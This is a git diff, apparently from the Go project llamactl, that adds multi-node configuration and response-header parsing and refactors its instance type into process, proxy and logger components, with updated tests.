Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
LocalNode string `yaml:"local_node,omitempty"`
Nodes map[string]NodeConfig `yaml:"nodes,omitempty"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
@@ -56,8 +60,14 @@ type ServerConfig struct {
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Allowed headers for CORS (e.g., "Accept", "Authorization", "Content-Type", "X-CSRF-Token")
AllowedHeaders []string `yaml:"allowed_headers"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
// Response headers to send with responses
ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
}
// InstancesConfig contains instance management configuration
@@ -121,6 +131,11 @@ type AuthConfig struct {
ManagementKeys []string `yaml:"management_keys"`
}
type NodeConfig struct {
Address string `yaml:"address"`
APIKey string `yaml:"api_key,omitempty"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
@@ -132,8 +147,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
AllowedHeaders: []string{"*"}, // Default to allow all headers
EnableSwagger: false,
},
LocalNode: "main",
Nodes: map[string]NodeConfig{},
Backends: BackendConfig{
LlamaCpp: BackendSettings{
Command: "llama-server",
@@ -198,6 +216,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
return cfg, err
}
// If local node is not defined in nodes, add it with default config
if _, ok := cfg.Nodes[cfg.LocalNode]; !ok {
cfg.Nodes[cfg.LocalNode] = NodeConfig{}
}
// 3. Override with environment variables
loadEnvVars(&cfg)
@@ -209,6 +232,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
}
// Validate port range
if cfg.Instances.PortRange[0] <= 0 || cfg.Instances.PortRange[1] <= 0 || cfg.Instances.PortRange[0] >= cfg.Instances.PortRange[1] {
return AppConfig{}, fmt.Errorf("invalid port range: %v", cfg.Instances.PortRange)
}
return cfg, nil
}
@@ -337,6 +365,12 @@ func loadEnvVars(cfg *AppConfig) {
}
parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
}
if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_RESPONSE_HEADERS"); llamaEnv != "" {
if cfg.Backends.LlamaCpp.ResponseHeaders == nil {
cfg.Backends.LlamaCpp.ResponseHeaders = make(map[string]string)
}
parseHeaders(llamaEnv, cfg.Backends.LlamaCpp.ResponseHeaders)
}
// vLLM backend
if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
@@ -380,6 +414,12 @@ func loadEnvVars(cfg *AppConfig) {
}
parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
}
if llamaEnv := os.Getenv("LLAMACTL_VLLM_RESPONSE_HEADERS"); llamaEnv != "" {
if cfg.Backends.VLLM.ResponseHeaders == nil {
cfg.Backends.VLLM.ResponseHeaders = make(map[string]string)
}
parseHeaders(llamaEnv, cfg.Backends.VLLM.ResponseHeaders)
}
// MLX backend
if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
@@ -394,6 +434,12 @@ func loadEnvVars(cfg *AppConfig) {
}
parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
}
if llamaEnv := os.Getenv("LLAMACTL_MLX_RESPONSE_HEADERS"); llamaEnv != "" {
if cfg.Backends.MLX.ResponseHeaders == nil {
cfg.Backends.MLX.ResponseHeaders = make(map[string]string)
}
parseHeaders(llamaEnv, cfg.Backends.MLX.ResponseHeaders)
}
// Instance defaults
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
@@ -443,6 +489,11 @@ func loadEnvVars(cfg *AppConfig) {
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
// Local node config
if localNode := os.Getenv("LLAMACTL_LOCAL_NODE"); localNode != "" {
cfg.LocalNode = localNode
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
@@ -481,6 +532,19 @@ func parseEnvVars(envString string, envMap map[string]string) {
}
}
// parseHeaders parses HTTP headers in format "KEY1=value1;KEY2=value2"
// and populates the provided environment map
func parseHeaders(envString string, envMap map[string]string) {
if envString == "" {
return
}
for _, envPair := range strings.Split(envString, ";") {
if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
envMap[parts[0]] = parts[1]
}
}
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
@@ -546,17 +610,3 @@ func getDefaultConfigLocations() []string {
return locations
}
// GetBackendSettings resolves backend settings
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
switch backendType {
case "llama-cpp":
return bc.LlamaCpp
case "vllm":
return bc.VLLM
case "mlx":
return bc.MLX
default:
return BackendSettings{}
}
}

View File

@@ -7,6 +7,20 @@ import (
"testing"
)
// GetBackendSettings resolves backend settings
func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings {
switch backendType {
case "llama-cpp":
return bc.LlamaCpp
case "vllm":
return bc.VLLM
case "mlx":
return bc.MLX
default:
return config.BackendSettings{}
}
}
func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set
cfg, err := config.LoadConfig("nonexistent-file.yaml")
@@ -205,29 +219,6 @@ instances:
}
}
func TestLoadConfig_InvalidYAML(t *testing.T) {
// Create a temporary config file with invalid YAML
tempDir := t.TempDir()
configFile := filepath.Join(tempDir, "invalid-config.yaml")
invalidContent := `
server:
host: "localhost"
port: not-a-number
instances:
[invalid yaml structure
`
err := os.WriteFile(configFile, []byte(invalidContent), 0644)
if err != nil {
t.Fatalf("Failed to write test config file: %v", err)
}
_, err = config.LoadConfig(configFile)
if err == nil {
t.Error("Expected LoadConfig to return error for invalid YAML")
}
}
func TestParsePortRange(t *testing.T) {
tests := []struct {
@@ -257,97 +248,6 @@ func TestParsePortRange(t *testing.T) {
}
}
// Remove the getDefaultConfigLocations test entirely
func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
// Test that environment variables are properly converted to correct types
testCases := []struct {
envVar string
envValue string
checkFn func(*config.AppConfig) bool
desc string
}{
{
envVar: "LLAMACTL_PORT",
envValue: "invalid-port",
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
desc: "invalid port number should keep default",
},
{
envVar: "LLAMACTL_MAX_INSTANCES",
envValue: "not-a-number",
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
desc: "invalid max instances should keep default",
},
{
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
envValue: "invalid-bool",
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
desc: "invalid boolean should keep default",
},
{
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
envValue: "invalid-range",
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
desc: "invalid port range should keep default",
},
}
for _, tc := range testCases {
t.Run(tc.desc, func(t *testing.T) {
os.Setenv(tc.envVar, tc.envValue)
defer os.Unsetenv(tc.envVar)
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if !tc.checkFn(&cfg) {
t.Errorf("Test failed: %s", tc.desc)
}
})
}
}
func TestLoadConfig_PartialFile(t *testing.T) {
// Test that partial config files work correctly (missing sections should use defaults)
tempDir := t.TempDir()
configFile := filepath.Join(tempDir, "partial-config.yaml")
// Only specify server config, instances should use defaults
configContent := `
server:
host: "partial-host"
port: 7777
`
err := os.WriteFile(configFile, []byte(configContent), 0644)
if err != nil {
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
// Server config should be from file
if cfg.Server.Host != "partial-host" {
t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host)
}
if cfg.Server.Port != 7777 {
t.Errorf("Expected port 7777, got %d", cfg.Server.Port)
}
// Instances config should be defaults
if cfg.Instances.PortRange != [2]int{8000, 9000} {
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
}
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
bc := &config.BackendConfig{
@@ -372,7 +272,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
}
// Test llama-cpp with Docker
settings := bc.GetBackendSettings("llama-cpp")
settings := getBackendSettings(bc, "llama-cpp")
if settings.Command != "custom-llama" {
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
}
@@ -387,7 +287,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
}
// Test vLLM without Docker
settings = bc.GetBackendSettings("vllm")
settings = getBackendSettings(bc, "vllm")
if settings.Command != "custom-vllm" {
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
}
@@ -399,33 +299,12 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
}
// Test MLX
settings = bc.GetBackendSettings("mlx")
settings = getBackendSettings(bc, "mlx")
if settings.Command != "custom-mlx" {
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
}
}
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
bc := &config.BackendConfig{}
// Test empty llama-cpp
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty vLLM
settings = bc.GetBackendSettings("vllm")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
}
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
// Test that backend environment variables work correctly
@@ -496,17 +375,132 @@ func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
}
}
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
}
// Test invalid backend type returns empty settings
settings := bc.GetBackendSettings("invalid-backend")
if settings.Command != "" {
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
}
func TestLoadConfig_LocalNode(t *testing.T) {
t.Run("default local node", func(t *testing.T) {
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "main" {
t.Errorf("Expected default local node 'main', got %q", cfg.LocalNode)
}
})
t.Run("local node from file", func(t *testing.T) {
tempDir := t.TempDir()
configFile := filepath.Join(tempDir, "test-config.yaml")
configContent := `
local_node: "worker1"
nodes:
worker1:
address: ""
worker2:
address: "http://192.168.1.10:8080"
api_key: "test-key"
`
err := os.WriteFile(configFile, []byte(configContent), 0644)
if err != nil {
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "worker1" {
t.Errorf("Expected local node 'worker1', got %q", cfg.LocalNode)
}
// Verify nodes map (includes default "main" + worker1 + worker2)
if len(cfg.Nodes) != 2 {
t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes))
}
// Verify local node exists and is empty
localNode, exists := cfg.Nodes["worker1"]
if !exists {
t.Error("Expected local node 'worker1' to exist in nodes map")
}
if localNode.Address != "" {
t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
}
if localNode.APIKey != "" {
t.Errorf("Expected local node api_key to be empty, got %q", localNode.APIKey)
}
// Verify remote node
remoteNode, exists := cfg.Nodes["worker2"]
if !exists {
t.Error("Expected remote node 'worker2' to exist in nodes map")
}
if remoteNode.Address != "http://192.168.1.10:8080" {
t.Errorf("Expected remote node address 'http://192.168.1.10:8080', got %q", remoteNode.Address)
}
// Verify default main node still exists
_, exists = cfg.Nodes["main"]
if exists {
t.Error("Default 'main' node should not exist when local_node is overridden")
}
})
t.Run("custom local node name in config", func(t *testing.T) {
tempDir := t.TempDir()
configFile := filepath.Join(tempDir, "test-config.yaml")
configContent := `
local_node: "primary"
nodes:
primary:
address: ""
worker1:
address: "http://192.168.1.10:8080"
`
err := os.WriteFile(configFile, []byte(configContent), 0644)
if err != nil {
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "primary" {
t.Errorf("Expected local node 'primary', got %q", cfg.LocalNode)
}
// Verify nodes map includes default "main" + primary + worker1
if len(cfg.Nodes) != 2 {
t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes))
}
localNode, exists := cfg.Nodes["primary"]
if !exists {
t.Error("Expected local node 'primary' to exist in nodes map")
}
if localNode.Address != "" {
t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
}
})
t.Run("local node from environment variable", func(t *testing.T) {
os.Setenv("LLAMACTL_LOCAL_NODE", "custom-node")
defer os.Unsetenv("LLAMACTL_LOCAL_NODE")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "custom-node" {
t.Errorf("Expected local node 'custom-node' from env var, got %q", cfg.LocalNode)
}
})
}

View File

@@ -1,276 +1,323 @@
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// Instance represents a running instance of the llama server
type Instance struct {
Name string `json:"name"`
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
// Global configuration
globalInstanceSettings *config.InstancesConfig
globalBackendSettings *config.BackendConfig
globalNodesConfig map[string]config.NodeConfig
localNodeName string `json:"-"` // Name of the local node for remote detection
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
status *status `json:"-"`
options *options `json:"-"`
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
// Components (can be nil for remote instances)
process *process `json:"-"`
proxy *proxy `json:"-"`
logger *logger `json:"-"`
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// New creates a new instance with the given name, log path, options and local node name
func New(name string, globalConfig *config.AppConfig, opts *Options, onStatusChange func(oldStatus, newStatus Status)) *Instance {
globalInstanceSettings := &globalConfig.Instances
globalBackendSettings := &globalConfig.Backends
globalNodesConfig := globalConfig.Nodes
localNodeName := globalConfig.LocalNode
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalInstanceSettings)
opts.validateAndApplyDefaults(name, globalInstanceSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
// Create status wrapper
status := newStatus(Stopped)
status.onStatusChange = onStatusChange
return &Process{
// Create options wrapper
options := newOptions(opts)
instance := &Instance{
Name: name,
options: options,
globalInstanceSettings: globalInstanceSettings,
globalBackendSettings: globalBackendSettings,
logger: logger,
timeProvider: realTimeProvider{},
globalNodesConfig: globalNodesConfig,
localNodeName: localNodeName,
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
status: status,
}
var err error
instance.proxy, err = newProxy(instance)
if err != nil {
log.Println("Warning: Failed to create proxy for instance", instance.Name, "-", err)
}
// Only create logger, proxy, and process for local instances
if !instance.IsRemote() {
instance.logger = newLogger(name, globalInstanceSettings.LogsDir)
instance.process = newProcess(instance)
}
return instance
}
// Start starts the instance
func (i *Instance) Start() error {
if i.process == nil {
return fmt.Errorf("instance %s has no process component (remote instances cannot be started locally)", i.Name)
}
return i.process.start()
}
// Stop stops the instance
func (i *Instance) Stop() error {
if i.process == nil {
return fmt.Errorf("instance %s has no process component (remote instances cannot be stopped locally)", i.Name)
}
return i.process.stop()
}
// Restart restarts the instance
func (i *Instance) Restart() error {
if i.process == nil {
return fmt.Errorf("instance %s has no process component (remote instances cannot be restarted locally)", i.Name)
}
return i.process.restart()
}
// WaitForHealthy waits for the instance to become healthy
func (i *Instance) WaitForHealthy(timeout int) error {
if i.process == nil {
return fmt.Errorf("instance %s has no process component (remote instances cannot be health checked locally)", i.Name)
}
return i.process.waitForHealthy(timeout)
}
// GetOptions returns the current options
func (i *Instance) GetOptions() *Options {
if i.options == nil {
return nil
}
return i.options.get()
}
// GetStatus returns the current status
func (i *Instance) GetStatus() Status {
if i.status == nil {
return Stopped
}
return i.status.get()
}
// SetStatus sets the status
func (i *Instance) SetStatus(s Status) {
if i.status != nil {
i.status.set(s)
}
}
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Port
}
}
// IsRunning returns true if the status is Running
func (i *Instance) IsRunning() bool {
if i.status == nil {
return false
}
return 0
return i.status.isRunning()
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Host
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Host
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Host
}
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
// SetOptions sets the options
func (i *Instance) SetOptions(opts *Options) {
if opts == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
// Preserve the original nodes to prevent changing instance location
if i.options != nil && i.options.get() != nil {
opts.Nodes = i.options.get().Nodes
}
// Validate and copy options
opts.validateAndApplyDefaults(i.Name, i.globalInstanceSettings)
if i.options != nil {
i.options.set(opts)
}
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
if i.proxy != nil {
i.proxy.clear()
}
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
func (i *Instance) SetTimeProvider(tp TimeProvider) {
if i.proxy != nil {
i.proxy.setTimeProvider(tp)
}
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
func (i *Instance) GetHost() string {
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
return "localhost"
}
return i.options.GetHost()
}
func (i *Instance) GetPort() int {
if i.options == nil {
return 0
}
return i.options.GetPort()
}
func (i *Instance) IsRemote() bool {
opts := i.GetOptions()
if opts == nil {
return false
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
host = i.options.MlxServerOptions.Host
port = i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
host = i.options.VllmServerOptions.Host
port = i.options.VllmServerOptions.Port
}
// If no nodes specified, it's a local instance
if len(opts.Nodes) == 0 {
return false
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
// If the local node is in the nodes map, treat it as a local instance
if _, isLocal := opts.Nodes[i.localNodeName]; isLocal {
return false
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
// Otherwise, it's a remote instance
return true
}
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
// GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) {
if i.logger == nil {
return "", fmt.Errorf("instance %s has no logger (remote instances don't have logs)", i.Name)
}
return i.logger.getLogs(num_lines)
}
// LastRequestTime returns the last request time as a Unix timestamp
func (i *Instance) LastRequestTime() int64 {
if i.proxy == nil {
return 0
}
return i.proxy.getLastRequestTime()
}
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Instance) UpdateLastRequestTime() {
if i.proxy != nil {
i.proxy.updateLastRequestTime()
}
}
// ShouldTimeout checks if the instance should timeout based on idle time
func (i *Instance) ShouldTimeout() bool {
if i.proxy == nil {
return false
}
return i.proxy.shouldTimeout()
}
// GetInflightRequests returns the current number of inflight requests
func (i *Instance) GetInflightRequests() int32 {
if i.proxy == nil {
return 0
}
return i.proxy.getInflightRequests()
}
// ServeHTTP serves HTTP requests through the proxy with request tracking and shutdown handling
func (i *Instance) ServeHTTP(w http.ResponseWriter, r *http.Request) error {
if i.proxy == nil {
return fmt.Errorf("instance %s has no proxy component", i.Name)
}
return i.proxy.serveHTTP(w, r)
}
func (i *Instance) getCommand() string {
opts := i.GetOptions()
if opts == nil {
return ""
}
return opts.BackendOptions.GetCommand(i.globalBackendSettings)
}
func (i *Instance) buildCommandArgs() []string {
opts := i.GetOptions()
if opts == nil {
return nil
}
i.proxy = proxy
return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
}
return i.proxy, nil
func (i *Instance) buildEnvironment() map[string]string {
opts := i.GetOptions()
if opts == nil {
return nil
}
return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment)
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
func (i *Instance) MarshalJSON() ([]byte, error) {
// Get options
opts := i.GetOptions()
// Determine if docker is enabled for this instance's backend
var dockerEnabled bool
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeVllm:
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeMlxLm:
// MLX does not support docker currently
}
}
dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
Name string `json:"name"`
Status *status `json:"status"`
Created int64 `json:"created,omitempty"`
Options *options `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
}{
Alias: (*Alias)(i),
Name: i.Name,
Status: i.status,
Created: i.Created,
Options: i.options,
DockerEnabled: dockerEnabled,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
func (i *Instance) UnmarshalJSON(data []byte) error {
// Explicitly deserialize to match MarshalJSON format
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
Name string `json:"name"`
Status *status `json:"status"`
Created int64 `json:"created,omitempty"`
Options *options `json:"options,omitempty"`
}{}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = aux.Options
}
// Set the fields
i.Name = aux.Name
i.Created = aux.Created
i.status = aux.Status
i.options = aux.Options
return nil
}

View File

@@ -3,48 +3,53 @@ package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
"time"
)
func TestNewInstance(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Instances: config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst := instance.New("test-instance", globalConfig, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
@@ -55,8 +60,8 @@ func TestNewInstance(t *testing.T) {
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -72,114 +77,89 @@ func TestNewInstance(t *testing.T) {
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
// Test that explicit values override defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
